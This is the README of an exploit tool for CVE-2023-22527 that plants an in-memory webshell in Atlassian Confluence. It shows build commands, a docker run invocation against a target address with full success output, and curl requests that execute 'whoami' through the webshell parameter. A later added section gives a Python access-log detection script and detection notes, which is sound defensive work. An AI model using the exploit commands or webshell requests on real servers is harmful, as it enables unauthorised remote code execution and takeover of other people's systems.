In Memory Confluence Webshell
This exploit will load a webshell into Confluence's memory. The webshell is implemented in ABCDEFG.java, although a random name will be assigned to it at exploitation time. After exploitation, the attacker can execute arbitrary programs via curl.
Compiling
To build a Docker image:
make docker
If you have a Go and Java build environment handy, you can also just use make:
albinolobster@mournland:~/cve-2023-22527/webshell$ make
gofmt -d -w cve-2023-22527.go
golangci-lint run --fix cve-2023-22527.go
javac ABCDEFG.java -classpath ./lib/servlet-api.jar
Note: ABCDEFG.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go
Usage Example
Add the webshell:
albinolobster@mournland:~/cve-2023-22527/webshell$ sudo docker run -it --network=host webshell -a -v -c -e -rhost 10.9.49.76 -rport 8090
time=2024-03-05T16:34:21.251Z level=STATUS msg="Starting target" index=0 host=10.9.49.76 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:34:21.390Z level=STATUS msg="Validating Confluence target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.094Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.76 port=8090 verified=true
time=2024-03-05T16:34:23.094Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.334Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.76 port=8090 version=8.5.3
time=2024-03-05T16:34:23.334Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.76 port=8090 vulnerable=yes
time=2024-03-05T16:34:23.334Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.520Z level=STATUS msg="Sending class VbbsGkzxox to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="In memory webshell available using VicodMajitk param"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Example usage: curl -kv http://10.9.49.76:8090/?VicodMajitk=whoami"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Exploit successfully completed" exploited=true
Use the webshell:
albinolobster@mournland:~/cve-2023-22527/webshell$ curl http://10.9.49.76:8090/?VicodMajitk=whoami
nt authority\network service
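Detection Example
The requests shown in the output above leave traces in the web access log: requests to /template/aui/text-inline.vm, followed by requests to / carrying a single randomly named query parameter. The Python below is an added example, not part of the original exploit repository; it assumes Common Log Format access log lines, and the sample lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (assumed; adapt LINE_RE to your log pattern).
SAMPLE_LOG = """\
10.9.49.10 - - [05/Mar/2024:16:34:23 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 512
10.9.49.10 - - [05/Mar/2024:16:34:23 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 498
10.9.49.22 - - [05/Mar/2024:16:35:02 +0000] "GET /?src=mail HTTP/1.1" 302 0
10.9.49.10 - - [05/Mar/2024:16:36:11 +0000] "GET /?VicodMajitk=whoami HTTP/1.1" 200 29
10.9.49.22 - - [05/Mar/2024:16:37:40 +0000] "GET /dashboard.action HTTP/1.1" 200 8841
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" \d{3} \S+')
TEMPLATE_PATH = "/template/aui/text-inline.vm"  # endpoint named in the exploit output above

def find_suspicious(log_text):
    """Return (reason, ip, timestamp, target) tuples in log order."""
    findings = []
    staged = set()  # clients that have already requested the template endpoint
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target = m["ip"], m["ts"], m["target"]
        url = urlsplit(target)
        if url.path == TEMPLATE_PATH:
            staged.add(ip)
            findings.append(("template-request", ip, ts, target))
            continue
        params = parse_qsl(url.query, keep_blank_values=True)
        # Heuristic: root path, exactly one alphabetic parameter, from a staged client.
        if ip in staged and url.path == "/" and len(params) == 1 and params[0][0].isalpha():
            findings.append(("possible-webshell-command", ip, ts, target))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding, sep="\t")
```

The per-client correlation misses a webshell that is used from a different address than the one that installed it, so treat every template-request hit as worth investigating on its own. Because the webshell lives only in memory, there is no dropped file to look for; the access log and a restart of the Confluence process are the relevant artifacts.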